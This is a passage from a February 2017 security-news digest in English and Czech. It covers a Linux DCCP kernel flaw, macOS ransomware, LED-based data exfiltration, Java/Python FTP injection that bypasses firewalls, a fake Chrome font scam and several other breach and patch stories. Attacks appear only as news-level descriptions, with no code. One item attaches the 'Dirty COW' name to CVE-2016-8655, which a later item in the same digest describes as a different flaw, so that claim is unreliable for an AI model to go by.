dccp_v6_conn_request successfully returns [3].” reads the description of the flaw published on the full disclosure mailing list.
“However, if IPV6_RECVPKTINFO is set on a socket, the address of the
skb is saved to ireq->pktopts and the ref count for skb is incremented
in dccp_v6_conn_request [4], so skb is still in use. Nevertheless, it
still gets freed in dccp_rcv_state_process.”
CVE-2017-6074
An attacker can control an object and overwrite its content with a pointer to a execute arbitrary code in the Kernel.
“An attacker can control what object that would be and overwrite its content with arbitrary data by using some of the kernel heap spraying techniques. If the overwritten object has any triggerable function pointers, an attacker gets to execute arbitrary code within the kernel,” full disclosure mailing list about the vulnerability reads.
It is important to highlight that the CVE-2017-6074 flaw is a local issue that could not be exploited by a remote attacker. In order to exploit the flaw, an attacker needs to have a local account access on the system.
The CVE-2017-6074 vulnerability has already been patched in the mainline kernel, users can apply the patch and rebuild the kernel of their OS or they can wait for the next kernel update from their Linux distro provider.
In December 2016, security experts discovered another privilege-escalation vulnerability in Linux kernel, tracked as CVE-2016-8655, that dated back to 2011.
The flaw was discovered by the security expert Phil Oester who dubbed it ‘Dirty COW.‘ The flaw could be exploited by a local attacker to escalate privileges.
The name “Dirty COW” is due to the fact that it’s triggered by a race condition in the way the Linux kernel’s memory subsystem handles copy-on-write (COW) breakage of private read-only memory mappings.
Filecoder is the new MacOS ransomware distributed through bittorrent
23.2.2017 securityaffairs Virus
A few days ago experts at antivirus firm ESET spotted a new MacOS ransomware, a rarity in the threat landscape, but it has a serious problem.
Malware experts from antivirus vendor ESET have discovered a new file-encrypting ransomware, dubbed OSX/Filecoder.E, targeting MacOS that is being distributed through bittorrent websites.“Early last week, we have seen a new ransomware campaign for Mac. This new ransomware, written in Swift, is distributed via BitTorrent distribution sites and calls itself “Patcher”, ostensibly an application for pirating popular software.” reads the analysis published by ESET.
The bad news for the victims is that they will not be able to recover their files, even if they pay the ransom.
MacOS ransomware is not common in the threat landscape, this is the second such malware discovered by the security experts after the researchers spotted the Keranger threat in March 2016.
The OSX/Filecoder.E MacOS ransomware masquerades itself as a cracking tool for commercial software like Adobe Premiere Pro CC and Microsoft Office for Mac. The fake cracking tool is being distributed as a bittorrent download.
The malware researchers noted that the ransomware is written in Apple’s Swift programming language and it appears to be the result of the work of a novice Vxer.
The MacOS ransomware is hard to install on the last OS X and MacOS versions because the installer is not signed with a developer certificate issued by Apple.
The OSX/Filecoder.E MacOS ransomware generates a single encryption key for all files and then stores the files in encrypted zip archives. Unfortunately, the malicious code is not able to send the encryption key to the C&C server before being destroyed, this makes impossible the file decryption.
The experts highlighted that implementation of the encryption process is effective and makes impossible to crack it.
“There is one big problem with this ransomware: it doesn’t have any code to communicate with any C&C server. This means that there is no way the key that was used to encrypt the files can be sent to the malware operators.” continues the analysis.
“The random ZIP password is generated with arc4random_uniform which is considered a secure random number generator,” “The key is also too long to brute force in a reasonable amount of time.”
At the time I was writing, the monitoring to the bitcoin wallet address used to receive the payment of the victims revealed that none has paid the ransom.
Experts believe that the crooks behind OSX/Filecoder. E are likely interested in scamming the victims instead of managing a botnet.
“This new crypto-ransomware, designed specifically for macOS, is surely not a masterpiece. Unfortunately, it’s still effective enough to prevent the victims accessing their own files and could cause serious damage.” closed the analysis.
Researchers exfiltrate data by blinking the LEDs on the hard drives
23.2.2017 securityaffairs Hacking
A team of Israeli researchers has devised a new technique to exfiltrate data from a machine by using a malware that controls hard drive LEDs.
Across the years, numerous studies demonstrated that it is possible to exfiltrate data from air-gapped networks in various ways and security experts warned to cover our webcam to avoid being spied by sophisticated malware.
Now a group of researchers from Ben-Gurion University of the Negev’s Cyber Security Research Center has devised a new technique to exfiltrate data from a machine by using a malware that controls hard drive LEDs.
“We show that a malware can indirectly control the HDD LED, turning it on and off rapidly (up to 5800 blinks per second) – a rate that exceeds the visual perception capabilities of humans. Sensitive information can be encoded and leaked over the LED signals, which can then be received remotely by different kinds of cameras and light sensors.” reads the paper published by the researchers. “Compared to other LED methods, our method is unique, because it is also covert – the HDD activity LED routinely flickers frequently, and therefore the user may not be suspicious to changes in its activity.”
The malware is able to transmit information forcing the LED indicators to blink, the group of experts led by the notorious researcher Mordechai Guri was able to flash the LED at around 5,800 on/off cycles per second as a data channel, a speed that allows transferring 4 Kbps.
The attackers can force the LEDs to blink at a rate of up to 6,000 times per second, which is indiscernible for human’s eyes, but potentially readable for light sensors.
“It’s possible for the attacker to do such fast blinking that a human never sees it,” explained Guri.
Of course, the attackers need to infect the target machine prior to the transmission.
The efficiency of the exfiltration technique depends on the abilities of the receiver components, it might be a Digital SLR or high-end security camera (15 bps), a GoPro-level camera (up to 120 bps), a Webcam or Google Glass Explorer (also 15 bps), or a smartphone camera (up to 60 bps).
In the following table are reported the Maximum bandwidth of different receivers:
The researchers published a video PoC of the technique in which a drone equipped with a receiver exfiltrated the data by flying out to a window through which the infected disk was visible and the LED was blinking.
The experts explained that it is very simple to control the hard disk LED due to the lack of generic API to control it. The malware just needs to perform a series of read/write operations to the disk in order to make the LED blinking at specific frequencies. On the other end, the receiver has to run a software that interprets the signals.
Below the portion of pseudocode that allows the data transmission by flashing the HDD lamp.
Even if the technique is very sophisticated an obvious countermeasure is the application of a cover on the computer’s LEDs, the experts mentioned other countermeasures but let me suggest to read their interesting paper for further details.
Java má další kritickou zranitelnost, zneužít jde integrovaný FTP klient
23.2.2017 SecurityWorld Zranitelnosti
Prostředí Javy a Pythonu nesprávně potvrzují platnost FTP odkazů, což může útočníkům případně usnadnit prolomení některých částí firewallu a přístup do lokální sítě.
Bezpečnostní výzkumník Alexander Klink odhalil zajímavý útok, kde zneužití XXE (XML External Entity útok) zranitelnosti v aplikace napsané v Javě umožňuje rozesílání e-mailů.
XXE zranitelnosti mohou být zneužity přelstěním aplikací, které provedou syntaktickou analýzu (parsování) specificky vytvořených XML souborů. Tyto soubory donutí XML parser odhalit citlivé informace jako jsou soubory, informace o adresář nebo i o procesech, které na serveru běží.
Klink popsal, že stejný typ zranitelností umí zmást běhové prostředí Javy tak, aby započalo FTP spojení se vzdálenými servery tím, že mu zašle FPT URL ve formátu ftp://user:password@host:port/file.ext.
Ukázalo se že, že vestavěná implementace FTP klienta v Javě nefiltruje speciální CR a LF znaky z odkazů a překládá je.
Vložením takových znaků do části pro uživatelské jméno nebo heslo v URL FTP může být FTP klient Javy zmaten natolik, aby začal vykonávat škodlivé příkazy, a dokonce se může tvářit a částečně fungovat jako SMTP (e-mailový protokol), protože syntaxe FTP a SMTP jsou si podobné.
Exploatací XXE zranitelnosti Klink ukázal, jak snadno může útočník přinutit aplikaci Javy odeslat e-mail na SMTP server.
„Tento útok je obzvláště zajímavý v situaci, kdy můžete poslat mail do interního (často nezabezpečeného, třeba i bez spam nebo malware filtru) e-mailového serveru ze stroje, který se zabývá XML parsingem,“ vysvětluje Klink v příspěvku na blogu.
Poté, co se o zranitelnosti objevené Klinkem dozvěděl Timothy Morgan, výzkumník u Blindspot Security, rozhodl se zveřejnit své znalosti o podobném útoku, který funguje v implementaci FTP v Javě i Pythonu. Tento útok je však mnohem vážnější, neboť dokáže prolomit firewall.
Morgan útoku říká „stream injection FTP prokolu skrze škodlivé URL“ a rovněž zahrnuje vložení škodlivých příkazu do FTP kvůli absenci CR a LF filtrování. Místo vkládání SMTP příkadů však Morgan zneužívá FTP port příkaz k přelstění klienta, aby otevřel datový kanál ke vzdálenému FTP serveru na specifickém TCP portu.
Jak výzkumník poukazuje, mnoho na Linuxu založených SPI firewallů, včetně komerčních, podporuje klasický model FTP interpretace a automaticky TCP port otevře a přepošle jej na LAN IP FTP klienta, pokud detekuje port příkaz v FTP trafficu z onoho klienta.
Podobný vzorec útoku je známi již poměrně mnoho let, proto vývojáři conntracku, Linuxové sady nástroje, které většina firewallů používá, přidaly dodatečnou ochranu; port se otevře pouze pokud se příkaz port objeví na úplném začátku TCP paketu, což zajišťuje, že klient skutečně příkaz poslal.
To pro útočníka představuje dvojí problém: prvně musí odhalit interní IP adresu klienta, aby byl schopen zfalšovat příkaz port a následně ještě sjednotit TCP packety mezi klientem serverem tak, aby se zfalšovaný příkaz ocitl na začátku packetu.
Morgan dokáže oba tyto kroky učinit pomocí svého stream injection útoků a zároveň tvrdí, že osobně vytvořil vlastní exploit, který však nehodlá jakožto etický hacker zveřejnit, dokud Oracle a Python neopraví kód svých integrovaných FTP klientů.
„Celý útok (včetně requestu, pomocí které se zjistí interní IP adresa oběti) lze typicky učinit pomocí pouhých tří SSRF útoků, které jeden TCP port otevřou,“ napsal Morgan v příspěvku na blogu. „Každý další SSRF útok může otevřít další TCP port.“
Zranitelnost lze zneužít mnoha způsoby, včetně využití proti uživatelům s Javou na počítači. Uživatelé ani nemusí spustit škodlivou Java aplikaci, protože exploit lze využít i přes Java Web Start.
„Pokud by uživatel navštívil webovou stránku se škodlivým kódem a měl nainstalovanou Javu, tak i s vypnutými Java applety by mohl spustit Java Web Start, který parsuje soubor JNLP,“ popisuje Morgan. „Tyto soubory by mohly obsahovat škodlivé FTP URL, které chybu spouští.“
Morgan prý útok otestoval proti vlastnímu Linuxovému firewallu běžícím na nedávném jádře a také proti Palo Alto Networks a Cisco Systems firewallům. Ty prokázaly zranitelnost vůči exploitu.
„Ačkoli testování komerčních firewallů bylo do této doby velmi omezené, zdá se pravděpodobné, že značná část firewallů na světě je vůči stream injection FTP protokolu zranitelná,“ popisuje.
Vývojáři Javy a Pythonu byli o problému informování, dokud však neopraví implementace FTP klientů, výzkumník doporučuje prodejcům firewallu dočasně v základu blokovat klasický FTP překlad.
Uživatelé by si měli ze systému odinstalovat Javu, nebo alespoň zablokovat plug-in v prohlížeči a zrušit asociaci Javy s .jnlp koncovkou. XML parsing v Javě je momentálně notně zranitelný, XXE zranitelnost jsou tak na platformě velmi běžné, dodává Morgan.
11-Year Old Linux Kernel Local Privilege Escalation Flaw Discovered
22.2.2017 thehackernews Vulnerebility
Another privilege-escalation vulnerability has been discovered in Linux kernel that dates back to 2005 and affects major distro of the Linux operating system, including Redhat, Debian, OpenSUSE, and Ubuntu.
Over a decade old Linux Kernel bug (CVE-2017-6074) has been discovered by security researcher Andrey Konovalov in the DCCP (Datagram Congestion Control Protocol) implementation using Syzkaller, a kernel fuzzing tool released by Google.
The vulnerability is a use-after-free flaw in the way the Linux kernel's "DCCP protocol implementation freed SKB (socket buffer) resources for a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO option is set on the socket."
The DCCP double-free vulnerability could allow a local unprivileged user to alter the Linux kernel memory, enabling them to cause a denial of service (system crash) or escalate privileges to gain administrative access on a system.
"An attacker can control what object that would be and overwrite its content with arbitrary data by using some of the kernel heap spraying techniques. If the overwritten object has any triggerable function pointers, an attacker gets to execute arbitrary code within the kernel," full disclosure mailing list about the vulnerability reads.
DCCP is a message-oriented transport layer protocol that minimizes the overhead of packet header size or end-node processing as much as possible and provides the establishment, maintenance and teardown of an unreliable packet flow, and the congestion control of that packet flow.
This vulnerability does not provide any way for an outsider to break into your system in the first place, as it is not a remote code execution (RCE) flaw and require an attacker to have a local account access on the system to exploit the flaw.
Almost two months ago, a similar privilege-escalation vulnerability (CVE-2016-8655) was uncovered in Linux kernel that dated back to 2011 and allowed an unprivileged local user to gain root privileges by exploiting a race condition in the af_packet implementation in the Linux kernel.
The vulnerability has already been patched in the mainline kernel. So, if you are an advanced Linux user, apply the patch and rebuild kernel yourself.
OR, you can wait for the next kernel update from your distro provider and apply it as soon as possible.
Yahoo Slashes Price of Verizon Deal $350 Million After Data Breaches
22.2.2017 securityweek IT
NEW YORK - Yahoo slashed the price of the sale of its core Internet business to Verizon by $350 million following a pair of major data breaches at Yahoo, the two companies announced Tuesday.
Under the revised terms of the deal, Verizon's purchase the Yahoo assets will now total $4.48 billion. Yahoo still faces probes and lawsuits related to the breaches, which affected more than 1.5 billion accounts.
The transaction had been delayed due to the hacks.
Yahoo announced in September that hackers in 2014 stole personal data from more than 500 million of its user accounts. It admitted another cyber attack in December, this one dating from 2013, affecting more than a billion users.
Under the terms of the revised agreement, Yahoo will continue to cover the cost of a Securities and Exchange Commission probe into the breaches and shareholder lawsuits.
However, other government investigations and third-party litigation related to the breaches will be shared by Verizon and Yahoo.
"We have always believed this acquisition makes strategic sense," said Verizon executive vice president Marni Walden.
"We look forward to moving ahead expeditiously so that we can quickly welcome Yahoo's tremendous talent and assets into our expanding portfolio in the digital advertising space."
Prices of Yahoo shares rose 0.3 percent to $45.24, while Verizon gained 0.4 percent to $49.39.
Cisco Launches New Firepower Firewalls
22.2.2017 securityweek Safety
Cisco announced on Wednesday the launch of four new threat-focused Firepower next-generation firewalls (NGFWs) designed for banks, retailers and other businesses that conduct a high volume of sensitive transactions.
The new products are part of the Firepower 2100 series NGFWs, which provide throughput ranging between 1.9 and 8.5 Gbps, and support up to two dozen 1 Gigabit Ethernet (GE) ports or sixteen 10 GE ports.
According to Cisco, the new firewalls have a dual CPU, multi-core architecture designed to optimize firewall, cryptographic and threat inspection functionality.
Cisco Firepower firewall appliance
“The design employs Intel multi-core CPUs for Layer 7 threat inspections (app visibility, intrusion detection, URL filtering, malware and file inspection, user identity, etc.) and a combination of merchant and a Network Processing Unit (NPU) for layer 2-4 traffic (stateful firewall, NAT, VPN-SSL encryption/decryption, and more),” explained Cisco’s David Stuart.
The networking giant says firewalls typically slow down throughput performance by up to 50 percent with intrusion prevention functionality fully enabled, but claims its new product can have a less than one percent impact.
Cisco also announced that it has made some improvements to its local, centralized and cloud-based management tools. This includes a web-based interface in the Firepower Device Manager to help users quickly deploy appliances via a setup wizard.
It also includes enhancements to the Firepower Management Center (FMC), which allows users to automate various security tasks, such as assessments, tuning, containment and remediation. The FMC can now also automatically receive third-party and customer-specific intelligence via the Threat Intelligence Director (TID).
Finally, Cisco said its Cloud Defense Orchestrator, designed for cloud-based policy management, now supports the Cisco Web Security Appliance (WSA) v. 11 and is available via a Europe-based cloud.
Firefox Users Fingerprinted via Cached Intermediate CA Certificates
22.2.2017 securityweek Safety
An attacker can discover various details about Firefox users due to the manner in which the browser caches intermediate CA certificates, a researcher has discovered.
When the server doesn’t deliver the complete certificate chain, Firefox loads the website if the intermediate CA certificate is cached, security researcher Alexander Klink discovered. By determining which websites use the same intermediate, an attacker could figure out some details about the user, the researcher says.
Normally, root Certificate Authorities (CAs) don’t use the main root certificate to secure connections, but generate intermediate certificates instead. Webservers use these intermediates to generate certificates for each user, and deliver these (server certificates) to the browser along with the intermediate CA certificate when establishing a connection.
When a server is misconfigured, only the server certificate is sent, which should result in the user getting an error instead of the website. However, if the intermediate CA certificate has been already cached, the user will be able to connect. While Chrome and Internet Explorer don’t rely on the entire chain to deliver a website, Firefox does, but uses cached CAs even when in Private Mode, the researcher has discovered.
According to Klink, an attacker could use this knowledge to determine specific details about targeted users, based on the intermediate CA certificates cached by their browsers. However, these details would be limited to geolocation, maybe browsing habits, and whether the victim’s browser runs in a sandbox (which would lack cached certificates). The attacker could sell this information to advertising companies or could leverage it to deliver specific content to the targeted users.
“In addition to the purely »statistical« view of having a fingerprint with a sequence of n bits representing the cache status for each tested CA, the fingerprint also contains additional semantic information. Certain CAs have customers mostly in one country or region, or might have even more specific use-cases which lets you infer even more information − i.e. a user who has the »Deutsche Bundestag CA« cached is most probably located in Germany and probably at least somewhat interested in politics,” the researcher explains.
Klink also notes that he contacted Mozilla on the matter in January, but that there are no details on what course of action the organization will take. The “cleanest solution” would be to avoid connecting to incorrectly configured servers, even if the intermediate CA is cached, but “Mozilla is reluctant to implement that without knowing the impact,” the researcher says.
Users can stay protected by regularly cleaning up their profiles, by creating new ones, by cleaning up existing ones from the Firefox UI, or by using the certutil command line tool. They can also block third-party requests with an addon, mainly because “the attack obviously needs to make (a lot of) third-party requests,” Klink concludes.
For the second time in a few months Montenegro suffered massive and prolonged cyberattacks
22.2.2017 securityaffairs Cyber
For the second time in a few months Montenegro suffered massive and prolonged cyberattacks against government and media websites.
According to the Balkan Insight, attackers have launched a renewed attack on the Montenegrin government and media.
The last wave of cyber attacks started on February 15 and lasted several days, according to the government experts it was a massive offensive coordinated by professional hackers.
“The government in Podgorica has vowed to take action after a series of large-scale, sophisticated and coordinated hacker attacks on the websites of state institutions and pro-government media.” reads the balkaninsight.com.
This isn’t the first time that Montenegro was targeted by the hackers, another massive attack hit the country’s institutions during October elections, amid speculation that the Russian Government was involved.
Montenegrin authorities are working with other experts of partner countries on attributing the attack and locating the hackers. The government announced plans to tighten cyber security to protect its infrastructure.
According to the Balkan Insight, Montenegro suffered an escalation of cyber attacks in 2016.
“As BIRN reported in January, a new analysis by the Public Administration Ministry on the scale of the cyber threat to Montenegro showed that hacking attacks rose in 2016. Attacks were “much more serious and sophisticated”, it said.” continues the Balkan Insight. “Over 200 attacks on websites, state institutions, online fraud and misuse of personal accounts were reported in 2016, compared with just six in 2012.”
Montenegro
Who is behind the attacks?
Experts speculate the involvement of a nation-state actor because the attacks appear as politically motivated and their level of sophistication is very high.
“The severity and sophistication of cyber-attacks affecting Montenegro during 2016 were reflected in the increased number of identified attacks on infrastructure and cyber espionage cases, as well as through phishing campaigns which targeted civil servants,” the report said.
Montenegro accused Russia of meddling in the election in October, but the Russian Government always denied any involvement in the cyber attacks. Some media close to ruling Democratic Party of Socialists claimed the attacks came from the same Russian hackers allegedly behind recent
“Some media close to ruling Democratic Party of Socialists claimed the attacks came from the same Russian hackers allegedly behind recent cyberattacks in the US.” continued the news agency.
According to Intelligence analysis, Russia secretly funneled money to anti-NATO opposition parties in the country and set up or co-opted media outlets to undermine former PM Milo Djukanovic government.
Microsoft Flaws Mitigated by Removing Admin Rights: Avecto
22.2.2017 securityweek Vulnerebility
Microsoft patched a total of 530 vulnerabilities in 2016 and many of them were mitigated by the removal of administrator rights, according to a report published this week by endpoint security firm Avecto.
Avecto’s Microsoft Vulnerabilities Report for 2016 shows that 189 of the flaws fixed by the tech giant last year were classified as critical, and 94 percent of the Windows issues can be mitigated by removing admin rights. This mitigation works for all critical vulnerabilities affecting Internet Explorer and Edge, and 99 percent of Office flaws.
Roughly two-thirds of all the vulnerabilities affecting Microsoft products can be mitigated using this method. The percentage increased in 2016, but it has been at a fairly steady level over the past years.
According to Avecto, the number of security holes reported to Microsoft has increased by more than 60 percent in the past years, from 333 in 2013 to 530 in 2016. However, judging by the first round of updates for 2017, the number could drop significantly this year.
While Windows 10 has been advertised as the most secure version of the operating system, experts pointed out that it had the highest proportion of vulnerabilities compared to other versions. The number of flaws affecting Windows 10 was nearly 50 percent higher than in Windows 8 and 8.1. Removal of admin rights mitigated 93 percent of Windows 10 vulnerabilities.
“Privilege management and application control should be the cornerstone of your endpoint security strategy, building up from there to create ever stronger, multiple layers of defense. These measures can have a dramatic impact on your ability to mitigate today's attacks,” explained Mark Austin, co-founder and co-CEO of Avecto. “Times have changed; removing admin rights and controlling applications is no longer difficult to achieve.”
Beware! Don't Fall For "Font Wasn't Found" Google Chrome Malware Scam
22.2.2017 thehackernews Virus
Next time when you accidentally or curiously land up on a website with jumbled content prompting you to download a missing font to read the blog by updating the Chrome font pack…
…Just Don't Download and Install It. It's a Trap!
Scammers and hackers are targeting Google Chrome users with this new hacking scam that's incredibly easy to fall for, prompting users to download a fake Google Chrome font pack update just to trick them into installing malware on their systems.
Here's What the Scam is and How it works:
It's a "The 'HoeflerText' font wasn't found" scam.
Security firm NeoSmart Technologies recently identified the malicious campaign while browsing an unnamed WordPress website that had allegedly already been compromised, possibly due to failing to apply timely security updates.
The scam is not a new one to identified by NeoSmart. It has been making rounds since last month.
The hackers are inserting JavaScript into poorly secured, but legitimate websites to modify the text rendering on them, which causes the sites to look all jumbled with mis-encoded text containing symbols and other random characters.
So if Chrome users come across such websites from a search engine result or social media site, the script makes the website unreadable and prompts them to fix the issue by updating their 'Chrome font pack.'
The prompt window says: "The 'HoeflerText' font wasn't found," and you're then asked to update the "Chrome Font Pack." If clicked, it actually installs a malware trojan on your machine.
The scam can also be used to infect victims computer with Spora ransomware -- one of the most well-run ransomware operations, discovered at the start of this year, with active infection channels, advanced crypto, and an advanced ransom payment service.
What makes this scam particularly appealing is that everything about the browser message looks legit, from the type of "missing font" and the dialog window to the Chrome logo and the right shade of blue on the "update" button.
How to identify the Scam?
There are several ways to recognize this scam.
First of all, the dialog window has been hard-coded to show that you are running Chrome version 53 even if you actually aren't, which might be a clue that something is not right.
Secondly, there's an issue with the filenames: Clicking the "Update" button proceeds to download an executable file titled "Chrome Font v7.5.1.exe." But this file is not the one shown in the malicious instruction image, which reads "Chrome_Font.exe."
Even if you fail to identify these clues, you may get a standard warning, saying "this file isn't downloaded often," when you try to download the file.
Chrome Does Not Flag it as Malware
However, what's strange is that the Chrome browser doesn't flag the file as malware, but the browser does block it because the file is not downloaded too often, which is a standard warning.
NeoSmart Technologies has since run the malware through VirusTotal, which revealed that currently only 9 out of 59 anti-virus software in the database accurately identify the file as malware.
So users are always recommended to exercise caution when downloading anything from the Internet onto their computers, to keep your antivirus software up-to-date and do not ever fall for scam asking you to update the Chrome font pack, as it already comes with everything you need.
Serious Breach Linked to Chinese APTs Comes to Light
22.2.2017 securityweek APT
Several major organizations may have been affected by a breach suffered by an IT services and software provider. The attack, linked to threat actors believed to be located in China, took place in 2015, but it has only now come to light.
A report published earlier this month by RSA describes Kingslayer, a supply chain attack that apparently targeted system administrators in some large organizations. The attackers breached the systems of a company that offers event log analyzers and replaced a legitimate application and its updates with a backdoored version.
The malicious version of the software was delivered between April 9 and April 25, 2015, and it was downloaded by at least one Windows system administrator working for a defense contractor.
While it’s unclear exactly how many organizations downloaded the backdoored software in the April 9-25 timeframe, RSA said the portal that hosted it had numerous subscribers, including four major telecoms providers, over ten western military organizations, more than two dozen Fortune 500 companies, five major defense contractors, and tens of IT solutions providers, government organizations, banks and universities.
While RSA has not named the company whose systems were compromised, investigative journalist Brian Krebs determined that it was Canada-based Altair Technologies Ltd. The company offers firewall log analyzers, a Windows event monitoring product, and a repository of troubleshooting information related to Windows event log messages (EventID.Net).
The EventID.Net website hosted EvLog, the software hijacked by the attackers. A notice posted on the site on June 2016 provides some details on the incident and recommendations for potentially affected users.
However, as Krebs pointed out, the advisory does not appear to have been shared on social media and there was no link to it from anywhere on the site – a link was added this week after the journalist contacted Altair Technologies. The company told Krebs it had no way of knowing who downloaded the software so potential victims were not notified directly either.
While Altair representatives said they don’t expect large organizations to use the EvLog tool, the company’s main website claims the EventID.Net portal has helped millions of users worldwide. SecurityWeek has reached out to Altair Technologies for clarifications.
RSA pointed out that the defense contractor targeted by Kingslayer was attacked only 11 weeks after the breach of Altair’s systems, which suggests that the attackers may have focused on other targets in those 11 weeks.
Evidence uncovered by RSA suggests that the attack was linked to Shell Crew, aka Deep Panda, and Codoso, aka Sunshop Group. Both Shell Crew and Codoso are advanced persistent threat (APT) groups believed to be operating out of China.
RSA also pointed to similarities with another supply chain attack known as the 2014 Monju incident, which targeted a nuclear facility in Japan. That attack was also linked to China.
Microsoft releases security updates for Flash Player, but two disclosed flaws remain unpatched
22.2.2017 securityaffairs Vulnerebility
On Tuesday Microsoft issued the security updates KB 4010250 that address flaws in Adobe Flash Player, but two already disclosed flaws remain unpatched.
On Tuesday Microsoft issued the security updates KB 4010250 that address flaws in Adobe Flash Player. The updates fix the vulnerabilities in Internet Explorer on Windows 8.1 and later, as well as Edge for Windows 10, but two already disclosed flaws remain unpatched.
The bad news is that two already disclosed flaws still remain uncovered by the security updates and could be exploited by attackers in the wild.
A few days ago, Microsoft announced that the February patches would be delayed until March due to a last minute issue, in response Google Project Zero experts published the details of the Remote Code Execution vulnerability in Windows.
Microsoft alerted its customers anticipating the incoming patches on Monday and urged them to update their systems as soon as possible.
Now Microsoft released the security patches and the company confirmed that “No other security updates are scheduled for release until the next scheduled monthly update release on March 14, 2017.”
The Bulletin MS17-005 for Adobe Flash Player addresses critical remote code execution (RCE) affecting Windows systems.
“Security Update for Adobe Flash Player (4010250) This security update resolves vulnerabilities in Adobe Flash Player when installed on all supported editions of Windows 8.1, Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1, Windows 10, and Windows Server 2016.” reads the security bulletin.
SMB zero-day flaw
As anticipated, the two flaws will remain unpatched until 14th March, giving attackers the opportunity to target Windows systems.
The first flaw is a Windows SMB (Server Message Block) vulnerability that affects Windows 8, Windows 10 and Windows Server. It is a memory corruption vulnerability in the SMBprotocol that can be exploited by a remote attacker, the proof-of-concept exploit code of the flaw was recently publicly released.
The second flaw doesn’t address by the last security updates is the one recently disclosed by the Google Project Zero team that affects Windows operating systems ranging from Windows Vista Service Pack 2 to the latest Windows 10.
Don’t waste time check for updates on your Windows PC and patch your system immediately to avoid the exploitation of the Flash Player software in your browser.
FTP Injection flaws in Java and Python allows firewall bypass
22.2.2017 securityaffairs Vulnerebility
The two programming languages, Java and Python, are affected by serious FTP Injection flaws that can be exploited by hackers to bypass any firewall.
Attackers can trick Java and Python applications to execute rogue FTP commands that would open ports in firewalls
The unpatched flaws reside in the way the two programming languages handle File Transfer Protocol (FTP) links, both don’t validate the syntax of the username parameter allowing attackers to trigger a so-called “protocol injection flaw.”Let’s see in details the two flaws:
Java/Python FTP Injection allows attackers to send unauthorized SMTP Emails
The security researcher Alexander Klink published the analysis of the FTP protocol injection vulnerability in Java’s XML eXternal Entity (XXE). The expert explained how to trigger the flaw to inject non-FTP malicious commands inside an FTP connection request.
It is important to highlight that the attack works even if the FTP connection fails, as FTP servers do support authentication, but doesn’t check for the present of carriage returns (CR) or line feeds (LF) in usernames.
“This attack is particularly interesting in a scenario where you can reach an (unrestricted, maybe not even spam- or malware-filtering) internal mail server from the machine doing the XML parsing.” states the blog post published by Alexander Klink. “It even allows for sending attachments, since the URL length seems to be unrestricted and only limited by available RAM (parsing a 400MB long URL did take more than 32 GBs of RAM for some reason, though ;-)).”
Java/Python FTP Injection allows attackers to Bypass Firewall
The security researcher Timothy Morgan from Blindspot Security devised a new attack technique leveraging on Java/Python FTP Injection to bypass firewalls.
The FTP protocol injection flaw could be exploited to trick the target firewall into accepting TCP connections from the web to the vulnerable host’s system on its “high” ports (from 1024 to 65535).”
FTP protocol injection attack is caused by an old and well-known security issue in FTP protocol called classic mode FTP that is still supported by default by many firewall vendors.
When a classic mode FTP connection is initiated, the firewall temporarily opens a port (typically included in the range 1024 and 65535) specified in the PORT command.
Using the FTP protocol injection issue in Java and Python, the attacker just needs to know the targeted host’s internal IP address while classic mode FTP connection is started.
In order to open a port in the targeted firewall the attackers need to make the following requests:
Determining Internal IP – Identify the victim’s internal IP address, in order to do it, the attackers “send an URL, see how the client behaves, then try another until the attack is successful.”
Packet Alignment – Determine packet alignment and ensure that the PORT command is injected at the right moment, making the attack work.
Exploit the vulnerability.
Once identified the process to bypass the firewall, all an attacker needs to do to launch the attack is to trick victims into accessing a malicious Java or Python applications running on a server to bypass the network defense.
“If a desktop user could be convinced to visit a malicious website while Java is installed, even if Java applets are disabled, they could still trigger Java Web Start to parse a JNLP (Java Network Launch Protocol) file,” Morgan said. “These files could contain malicious FTP URLs which trigger this bug.” reads the analysis.
“Also note, that since Java parses JNLP files before presenting the user with any security warnings, the attack can be entirely successful without any indication to the user (unless the browser itself warns the user about Java Web Start being launched).”
A similar flaw resides in Python’s urllib2 and urllib libraries, although “this injection appears to be limited to attacks via directory names specified in the URL.”
Both flaws were already reported to the companies, the FTP protocol injection flaw was reported to the Python team in January 2016 and Oracle in November 2016, but they are still unpatched.
Morgan has also developed a proof-of-concept (PoC) exploit code that he will release only after both Oracle and Python will relaese the necessary security updates.
According to Morgan his exploit code has successfully been tested against Palo Alto Networks and Cisco ASA firewalls, the list of vulnerable network security devices could include many other systems.
Below Morgan’s recommendations:
Consider uninstalling Java from all desktop systems. If this is not possible due to legacy application requirements, disable the Java browser plugin from all browsers and disassociate the .jnlp file extension from the Java Web Start binary.
Consider requesting an update to fix these issues from Oracle and the Python Software Foundation. Be sure to apply security updates to all versions of Java and Python, including those running on application servers and appliances.
Disable classic mode FTP in all firewalls, allowing only passive mode.
České podniky se bojí selhání techniky a neopatrnosti uživatelů
22.2.2017 SecurityWorld Zabezpečení
Acronis představil výsledky svého lokálního průzkumu v oblasti zálohování, který provedl letos v lednu a únoru mezi českými prodejními partnery.
Z průzkumu vyplývá, že v souvislosti se ztrátou důležitých podnikových dat se 83 % českých společností a organizací nejvíce obává selhání své techniky. Nejčastěji potřebují zálohovat fyzické servery, ale rychle narůstá podíl zálohování virtualizované infrastruktury.
Klíčová zjištění z lokálního průzkumu:
České firmy a organizace se v souvislosti se ztrátou podnikových dat obávají selhání či poškození své techniky (83 %), neopatrnosti uživatelů (78 %) a malwarových a ransomwarových útoků (61 %);
Nejčastěji firmy řeší zálohování fyzických serverů (72 %), stanic (51 %), virtualizace VMware (49 %) a virtualizace Hyper-V (44 %);
V současné době preferuje lokální zálohovací řešení 88 % firemních zákazníků, 12 % upřednostňuje cloud;
Jako nejrizikovější trendy letošního roku vnímají především hrozby ransomwaru (77 %) a sociálních sítí (39 %);
„Jen v roce 2016 ransomware způsobil škody v hodnotě 1 miliardy dolarů a stal se v současnosti bezpochyby hrozbou číslo jedna,“ řekl Zdeněk Bínek, zodpovědný za prodej řešení Acronis na českém a slovenském trhu. „Protože jsou útoky stále sofistikovanější a napadají nejen standardní firemní data, ale také jejich zálohy a samotné zálohovací systémy, bude stále důležitější, aby backup řešení obsahovala aktivní ochranu proti ransomwaru. Po takovýchto řešeních letos poroste poptávka nejvíce.”
Microsoft releases update for Flash Player, but leaves two disclosed Flaws Unpatched
22.2.2017 thehackernews Vulnerebility
Microsoft on Tuesday released security update (KB 4010250) to patch flaws in Adobe Flash Player for its customers using Internet Explorer on Windows 8.1 and later, as well as Edge for Windows 10, but two already disclosed flaws remain unpatched.
